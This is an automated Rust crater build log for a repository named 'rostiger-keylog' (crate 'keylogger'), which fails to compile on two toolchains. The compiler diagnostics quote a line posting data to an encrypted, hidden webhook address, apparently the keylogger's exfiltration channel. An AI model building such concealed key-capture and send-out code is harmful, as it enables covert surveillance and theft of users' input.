[INFO] cloning repository https://github.com/137-Trimethylxanthin/rostiger-keylog
[INFO] running `Command { std: "git" "-c" "credential.helper=" "-c" "credential.helper=/workspace/cargo-home/bin/git-credential-null" "clone" "--bare" "https://github.com/137-Trimethylxanthin/rostiger-keylog" "/workspace/cache/git-repos/https%3A%2F%2Fgithub.com%2F137-Trimethylxanthin%2Frostiger-keylog", kill_on_drop: false }`
[INFO] [stderr] Cloning into bare repository '/workspace/cache/git-repos/https%3A%2F%2Fgithub.com%2F137-Trimethylxanthin%2Frostiger-keylog'...
[INFO] running `Command { std: "git" "rev-parse" "HEAD", kill_on_drop: false }`
[INFO] [stdout] 7bf185b03ced738f71c4af39fd20b633a9164519
[INFO] testing 137-Trimethylxanthin/rostiger-keylog against 1.75.0 for beta-1.76-1
[INFO] running `Command { std: "git" "clone" "/workspace/cache/git-repos/https%3A%2F%2Fgithub.com%2F137-Trimethylxanthin%2Frostiger-keylog" "/workspace/builds/worker-6-tc1/source", kill_on_drop: false }`
[INFO] [stderr] Cloning into '/workspace/builds/worker-6-tc1/source'...
[INFO] [stderr] done.
[INFO] validating manifest of git repo https://github.com/137-Trimethylxanthin/rostiger-keylog on toolchain 1.75.0
[INFO] running `Command { std: CARGO_HOME="/workspace/cargo-home" RUSTUP_HOME="/workspace/rustup-home" "/workspace/cargo-home/bin/cargo" "+1.75.0" "metadata" "--manifest-path" "Cargo.toml" "--no-deps", kill_on_drop: false }`
[INFO] started tweaking git repo https://github.com/137-Trimethylxanthin/rostiger-keylog
[INFO] finished tweaking git repo https://github.com/137-Trimethylxanthin/rostiger-keylog
[INFO] tweaked toml for git repo https://github.com/137-Trimethylxanthin/rostiger-keylog written to /workspace/builds/worker-6-tc1/source/Cargo.toml
[INFO] crate git repo https://github.com/137-Trimethylxanthin/rostiger-keylog already has a lockfile, it will not be regenerated
[INFO] running `Command { std: CARGO_HOME="/workspace/cargo-home" RUSTUP_HOME="/workspace/rustup-home" "/workspace/cargo-home/bin/cargo" "+1.75.0" "fetch" "--manifest-path" "Cargo.toml", kill_on_drop: false }`
[INFO] [stderr]     Updating crates.io index
[INFO] [stderr]  Downloading crates ...
[INFO] [stderr]   Downloaded hash_limette v0.1.4
[INFO] running `Command { std: "docker" "create" "-v" "/var/lib/crater-agent-workspace/builds/worker-6-tc1/target:/opt/rustwide/target:rw,Z" "-v" "/var/lib/crater-agent-workspace/builds/worker-6-tc1/source:/opt/rustwide/workdir:ro,Z" "-v" "/var/lib/crater-agent-workspace/cargo-home:/opt/rustwide/cargo-home:ro,Z" "-v" "/var/lib/crater-agent-workspace/rustup-home:/opt/rustwide/rustup-home:ro,Z" "-e" "SOURCE_DIR=/opt/rustwide/workdir" "-e" "CARGO_TARGET_DIR=/opt/rustwide/target" "-e" "CARGO_HOME=/opt/rustwide/cargo-home" "-e" "RUSTUP_HOME=/opt/rustwide/rustup-home" "-w" "/opt/rustwide/workdir" "-m" "1610612736" "--user" "0:0" "--network" "none" "ghcr.io/rust-lang/crates-build-env/linux@sha256:2788e3201cd34a07e3172128adcd8b3090168a8e3bcc40d7c032b9dda1df7d1c" "/opt/rustwide/cargo-home/bin/cargo" "+1.75.0" "metadata" "--no-deps" "--format-version=1", kill_on_drop: false }`
[INFO] [stdout] d665d0cd25997d64a706e5a52bb712d0cc79db898a55912a6c266f831888ea56
[INFO] running `Command { std: "docker" "start" "-a" "d665d0cd25997d64a706e5a52bb712d0cc79db898a55912a6c266f831888ea56", kill_on_drop: false }`
[INFO] running `Command { std: "docker" "inspect" "d665d0cd25997d64a706e5a52bb712d0cc79db898a55912a6c266f831888ea56", kill_on_drop: false }`
[INFO] running `Command { std: "docker" "rm" "-f" "d665d0cd25997d64a706e5a52bb712d0cc79db898a55912a6c266f831888ea56", kill_on_drop: false }`
[INFO] [stdout] d665d0cd25997d64a706e5a52bb712d0cc79db898a55912a6c266f831888ea56
[INFO] running `Command { std: "docker" "create" "-v" "/var/lib/crater-agent-workspace/builds/worker-6-tc1/target:/opt/rustwide/target:rw,Z" "-v" "/var/lib/crater-agent-workspace/builds/worker-6-tc1/source:/opt/rustwide/workdir:ro,Z" "-v" "/var/lib/crater-agent-workspace/cargo-home:/opt/rustwide/cargo-home:ro,Z" "-v" "/var/lib/crater-agent-workspace/rustup-home:/opt/rustwide/rustup-home:ro,Z" "-e" "SOURCE_DIR=/opt/rustwide/workdir" "-e" "CARGO_TARGET_DIR=/opt/rustwide/target" "-e" "CARGO_INCREMENTAL=0" "-e" "RUST_BACKTRACE=full" "-e" "RUSTFLAGS=--cap-lints=warn" "-e" "RUSTDOCFLAGS=--cap-lints=warn" "-e" "CARGO_HOME=/opt/rustwide/cargo-home" "-e" "RUSTUP_HOME=/opt/rustwide/rustup-home" "-w" "/opt/rustwide/workdir" "-m" "1610612736" "--user" "0:0" "--network" "none" "ghcr.io/rust-lang/crates-build-env/linux@sha256:2788e3201cd34a07e3172128adcd8b3090168a8e3bcc40d7c032b9dda1df7d1c" "/opt/rustwide/cargo-home/bin/cargo" "+1.75.0" "build" "--frozen" "--message-format=json", kill_on_drop: false }`
[INFO] [stdout] 9ce537bbea466d637cec51069d57cd8250048e4e430e3387a92b2ab69b4c0fc2
[INFO] running `Command { std: "docker" "start" "-a" "9ce537bbea466d637cec51069d57cd8250048e4e430e3387a92b2ab69b4c0fc2", kill_on_drop: false }`
[INFO] [stderr]    Compiling vcpkg v0.2.15
[INFO] [stderr]    Compiling scopeguard v1.2.0
[INFO] [stderr]    Compiling cc v1.0.82
[INFO] [stderr]    Compiling smallvec v1.11.0
[INFO] [stderr]    Compiling unicase v2.6.0
[INFO] [stderr]    Compiling openssl v0.10.56
[INFO] [stderr]    Compiling futures-util v0.3.28
[INFO] [stderr]    Compiling openssl-macros v0.1.1
[INFO] [stderr]    Compiling lock_api v0.4.10
[INFO] [stderr]    Compiling parking_lot_core v0.9.8
[INFO] [stderr]    Compiling serde v1.0.183
[INFO] [stderr]    Compiling parking_lot v0.12.1
[INFO] [stderr]    Compiling log v0.4.20
[INFO] [stderr]    Compiling mime_guess v2.0.4
[INFO] [stderr]    Compiling tokio v1.31.0
[INFO] [stderr]    Compiling serde_json v1.0.105
[INFO] [stderr]    Compiling hash_limette v0.1.4
[INFO] [stderr]    Compiling openssl-sys v0.9.91
[INFO] [stderr]    Compiling native-tls v0.2.11
[INFO] [stderr]    Compiling serde_urlencoded v0.7.1
[INFO] [stderr]    Compiling tokio-util v0.7.8
[INFO] [stderr]    Compiling h2 v0.3.20
[INFO] [stderr]    Compiling tokio-native-tls v0.3.1
[INFO] [stderr]    Compiling hyper v0.14.27
[INFO] [stderr]    Compiling hyper-tls v0.5.0
[INFO] [stderr]    Compiling reqwest v0.11.18
[INFO] [stderr]    Compiling keylogger v0.1.0 (/opt/rustwide/workdir)
[INFO] [stdout] error[E0423]: expected value, found built-in attribute `path`
[INFO] [stdout]  --> src/unix.rs:2:25
[INFO] [stdout]   |
[INFO] [stdout] 2 |     println!("start:{}",path);
[INFO] [stdout]   |                         ^^^^ not a value
[INFO] [stdout] 
[INFO] [stdout] 
[INFO] [stdout] warning: unused variable: `res`
[INFO] [stdout]   --> src/main.rs:47:9
[INFO] [stdout]    |
[INFO] [stdout] 47 |     let res = client.post(decrypt(WEB_HOOK, None))
[INFO] [stdout]    |         ^^^ help: if this is intentional, prefix it with an underscore: `_res`
[INFO] [stdout]    |
[INFO] [stdout]    = note: `#[warn(unused_variables)]` on by default
[INFO] [stdout] 
[INFO] [stdout] 
[INFO] [stdout] error[E0277]: `()` is not a future
[INFO] [stdout]   --> src/main.rs:36:13
[INFO] [stdout]    |
[INFO] [stdout] 36 |     start().await.unwrap();
[INFO] [stdout]    |     ------- ^^^^^ `()` is not a future
[INFO] [stdout]    |     |
[INFO] [stdout]    |     this call returns `()`
[INFO] [stdout]    |
[INFO] [stdout]    = help: the trait `Future` is not implemented for `()`
[INFO] [stdout]    = note: () must be a future or must implement `IntoFuture` to be awaited
[INFO] [stdout]    = note: required for `()` to implement `IntoFuture`
[INFO] [stdout] help: remove the `.await`
[INFO] [stdout]    |
[INFO] [stdout] 36 -     start().await.unwrap();
[INFO] [stdout] 36 +     start().unwrap();
[INFO] [stdout]    |
[INFO] [stdout] help: alternatively, consider making `fn start` asynchronous
[INFO] [stdout]   --> src/unix.rs:1:4
[INFO] [stdout]    |
[INFO] [stdout] 1  | pub async fn start(){
[INFO] [stdout]    |     +++++
[INFO] [stdout] 
[INFO] [stdout] 
[INFO] [stdout] error: aborting due to 2 previous errors; 1 warning emitted
[INFO] [stdout] 
[INFO] [stdout] 
[INFO] [stdout] Some errors have detailed explanations: E0277, E0423.
[INFO] [stdout] 
[INFO] [stdout] For more information about an error, try `rustc --explain E0277`.
[INFO] [stdout] 
[INFO] [stderr] error: could not compile `keylogger` (bin "keylogger") due to 3 previous errors; 1 warning emitted
[INFO] running `Command { std: "docker" "inspect" "9ce537bbea466d637cec51069d57cd8250048e4e430e3387a92b2ab69b4c0fc2", kill_on_drop: false }`
[INFO] running `Command { std: "docker" "rm" "-f" "9ce537bbea466d637cec51069d57cd8250048e4e430e3387a92b2ab69b4c0fc2", kill_on_drop: false }`
[INFO] [stdout] 9ce537bbea466d637cec51069d57cd8250048e4e430e3387a92b2ab69b4c0fc2
[INFO] testing 137-Trimethylxanthin/rostiger-keylog against beta-2023-12-22 for beta-1.76-1
[INFO] running `Command { std: "git" "clone" "/workspace/cache/git-repos/https%3A%2F%2Fgithub.com%2F137-Trimethylxanthin%2Frostiger-keylog" "/workspace/builds/worker-6-tc2/source", kill_on_drop: false }`
[INFO] [stderr] Cloning into '/workspace/builds/worker-6-tc2/source'...
[INFO] [stderr] done.
[INFO] validating manifest of git repo https://github.com/137-Trimethylxanthin/rostiger-keylog on toolchain beta-2023-12-22
[INFO] running `Command { std: CARGO_HOME="/workspace/cargo-home" RUSTUP_HOME="/workspace/rustup-home" "/workspace/cargo-home/bin/cargo" "+beta-2023-12-22" "metadata" "--manifest-path" "Cargo.toml" "--no-deps", kill_on_drop: false }`
[INFO] started tweaking git repo https://github.com/137-Trimethylxanthin/rostiger-keylog
[INFO] finished tweaking git repo https://github.com/137-Trimethylxanthin/rostiger-keylog
[INFO] tweaked toml for git repo https://github.com/137-Trimethylxanthin/rostiger-keylog written to /workspace/builds/worker-6-tc2/source/Cargo.toml
[INFO] crate git repo https://github.com/137-Trimethylxanthin/rostiger-keylog already has a lockfile, it will not be regenerated
[INFO] running `Command { std: CARGO_HOME="/workspace/cargo-home" RUSTUP_HOME="/workspace/rustup-home" "/workspace/cargo-home/bin/cargo" "+beta-2023-12-22" "fetch" "--manifest-path" "Cargo.toml", kill_on_drop: false }`
[INFO] running `Command { std: "docker" "create" "-v" "/var/lib/crater-agent-workspace/builds/worker-6-tc2/target:/opt/rustwide/target:rw,Z" "-v" "/var/lib/crater-agent-workspace/builds/worker-6-tc2/source:/opt/rustwide/workdir:ro,Z" "-v" "/var/lib/crater-agent-workspace/cargo-home:/opt/rustwide/cargo-home:ro,Z" "-v" "/var/lib/crater-agent-workspace/rustup-home:/opt/rustwide/rustup-home:ro,Z" "-e" "SOURCE_DIR=/opt/rustwide/workdir" "-e" "CARGO_TARGET_DIR=/opt/rustwide/target" "-e" "CARGO_HOME=/opt/rustwide/cargo-home" "-e" "RUSTUP_HOME=/opt/rustwide/rustup-home" "-w" "/opt/rustwide/workdir" "-m" "1610612736" "--user" "0:0" "--network" "none" "ghcr.io/rust-lang/crates-build-env/linux@sha256:2788e3201cd34a07e3172128adcd8b3090168a8e3bcc40d7c032b9dda1df7d1c" "/opt/rustwide/cargo-home/bin/cargo" "+beta-2023-12-22" "metadata" "--no-deps" "--format-version=1", kill_on_drop: false }`
[INFO] [stdout] fb3301ac5925816b94381f72b4c981a901eff04bfaa1dd52a52eb8bcbb223023
[INFO] running `Command { std: "docker" "start" "-a" "fb3301ac5925816b94381f72b4c981a901eff04bfaa1dd52a52eb8bcbb223023", kill_on_drop: false }`
[INFO] running `Command { std: "docker" "inspect" "fb3301ac5925816b94381f72b4c981a901eff04bfaa1dd52a52eb8bcbb223023", kill_on_drop: false }`
[INFO] running `Command { std: "docker" "rm" "-f" "fb3301ac5925816b94381f72b4c981a901eff04bfaa1dd52a52eb8bcbb223023", kill_on_drop: false }`
[INFO] [stdout] fb3301ac5925816b94381f72b4c981a901eff04bfaa1dd52a52eb8bcbb223023
[INFO] running `Command { std: "docker" "create" "-v" "/var/lib/crater-agent-workspace/builds/worker-6-tc2/target:/opt/rustwide/target:rw,Z" "-v" "/var/lib/crater-agent-workspace/builds/worker-6-tc2/source:/opt/rustwide/workdir:ro,Z" "-v" "/var/lib/crater-agent-workspace/cargo-home:/opt/rustwide/cargo-home:ro,Z" "-v" "/var/lib/crater-agent-workspace/rustup-home:/opt/rustwide/rustup-home:ro,Z" "-e" "SOURCE_DIR=/opt/rustwide/workdir" "-e" "CARGO_TARGET_DIR=/opt/rustwide/target" "-e" "CARGO_INCREMENTAL=0" "-e" "RUST_BACKTRACE=full" "-e" "RUSTFLAGS=--cap-lints=warn" "-e" "RUSTDOCFLAGS=--cap-lints=warn" "-e" "CARGO_HOME=/opt/rustwide/cargo-home" "-e" "RUSTUP_HOME=/opt/rustwide/rustup-home" "-w" "/opt/rustwide/workdir" "-m" "1610612736" "--user" "0:0" "--network" "none" "ghcr.io/rust-lang/crates-build-env/linux@sha256:2788e3201cd34a07e3172128adcd8b3090168a8e3bcc40d7c032b9dda1df7d1c" "/opt/rustwide/cargo-home/bin/cargo" "+beta-2023-12-22" "build" "--frozen" "--message-format=json", kill_on_drop: false }`
[INFO] [stdout] 7de671d05df25bfef2bdebb054a3750032627ecead1e57ee052009ab0f546023
[INFO] running `Command { std: "docker" "start" "-a" "7de671d05df25bfef2bdebb054a3750032627ecead1e57ee052009ab0f546023", kill_on_drop: false }`
[INFO] [stderr]    Compiling vcpkg v0.2.15
[INFO] [stderr]    Compiling scopeguard v1.2.0
[INFO] [stderr]    Compiling cc v1.0.82
[INFO] [stderr]    Compiling smallvec v1.11.0
[INFO] [stderr]    Compiling unicase v2.6.0
[INFO] [stderr]    Compiling futures-util v0.3.28
[INFO] [stderr]    Compiling openssl v0.10.56
[INFO] [stderr]    Compiling openssl-macros v0.1.1
[INFO] [stderr]    Compiling lock_api v0.4.10
[INFO] [stderr]    Compiling parking_lot_core v0.9.8
[INFO] [stderr]    Compiling serde v1.0.183
[INFO] [stderr]    Compiling log v0.4.20
[INFO] [stderr]    Compiling parking_lot v0.12.1
[INFO] [stderr]    Compiling mime_guess v2.0.4
[INFO] [stderr]    Compiling serde_json v1.0.105
[INFO] [stderr]    Compiling hash_limette v0.1.4
[INFO] [stderr]    Compiling tokio v1.31.0
[INFO] [stderr]    Compiling openssl-sys v0.9.91
[INFO] [stderr]    Compiling native-tls v0.2.11
[INFO] [stderr]    Compiling serde_urlencoded v0.7.1
[INFO] [stderr]    Compiling tokio-util v0.7.8
[INFO] [stderr]    Compiling h2 v0.3.20
[INFO] [stderr]    Compiling tokio-native-tls v0.3.1
[INFO] [stderr]    Compiling hyper v0.14.27
[INFO] [stderr]    Compiling hyper-tls v0.5.0
[INFO] [stderr]    Compiling reqwest v0.11.18
[INFO] [stderr]    Compiling keylogger v0.1.0 (/opt/rustwide/workdir)
[INFO] [stdout] error[E0423]: expected value, found built-in attribute `path`
[INFO] [stdout]  --> src/unix.rs:2:25
[INFO] [stdout]   |
[INFO] [stdout] 2 |     println!("start:{}",path);
[INFO] [stdout]   |                         ^^^^ not a value
[INFO] [stdout] 
[INFO] [stdout] 
[INFO] [stdout] warning: unused variable: `res`
[INFO] [stdout]   --> src/main.rs:47:9
[INFO] [stdout]    |
[INFO] [stdout] 47 |     let res = client.post(decrypt(WEB_HOOK, None))
[INFO] [stdout]    |         ^^^ help: if this is intentional, prefix it with an underscore: `_res`
[INFO] [stdout]    |
[INFO] [stdout]    = note: `#[warn(unused_variables)]` on by default
[INFO] [stdout] 
[INFO] [stdout] 
[INFO] [stdout] error[E0277]: `()` is not a future
[INFO] [stdout]   --> src/main.rs:36:13
[INFO] [stdout]    |
[INFO] [stdout] 36 |     start().await.unwrap();
[INFO] [stdout]    |     ------- ^^^^^ `()` is not a future
[INFO] [stdout]    |     |
[INFO] [stdout]    |     this call returns `()`
[INFO] [stdout]    |
[INFO] [stdout]    = help: the trait `Future` is not implemented for `()`
[INFO] [stdout]    = note: () must be a future or must implement `IntoFuture` to be awaited
[INFO] [stdout]    = note: required for `()` to implement `IntoFuture`
[INFO] [stdout] help: remove the `.await`
[INFO] [stdout]    |
[INFO] [stdout] 36 -     start().await.unwrap();
[INFO] [stdout] 36 +     start().unwrap();
[INFO] [stdout]    |
[INFO] [stdout] help: alternatively, consider making `fn start` asynchronous
[INFO] [stdout]   --> src/unix.rs:1:4
[INFO] [stdout]    |
[INFO] [stdout] 1  | pub async fn start(){
[INFO] [stdout]    |     +++++
[INFO] [stdout] 
[INFO] [stdout] 
[INFO] [stdout] error: aborting due to 2 previous errors; 1 warning emitted
[INFO] [stdout] 
[INFO] [stdout] 
[INFO] [stdout] Some errors have detailed explanations: E0277, E0423.
[INFO] [stdout] 
[INFO] [stdout] For more information about an error, try `rustc --explain E0277`.
[INFO] [stdout] 
[INFO] [stderr] error: could not compile `keylogger` (bin "keylogger") due to 3 previous errors; 1 warning emitted
[INFO] running `Command { std: "docker" "inspect" "7de671d05df25bfef2bdebb054a3750032627ecead1e57ee052009ab0f546023", kill_on_drop: false }`
[INFO] running `Command { std: "docker" "rm" "-f" "7de671d05df25bfef2bdebb054a3750032627ecead1e57ee052009ab0f546023", kill_on_drop: false }`
[INFO] [stdout] 7de671d05df25bfef2bdebb054a3750032627ecead1e57ee052009ab0f546023
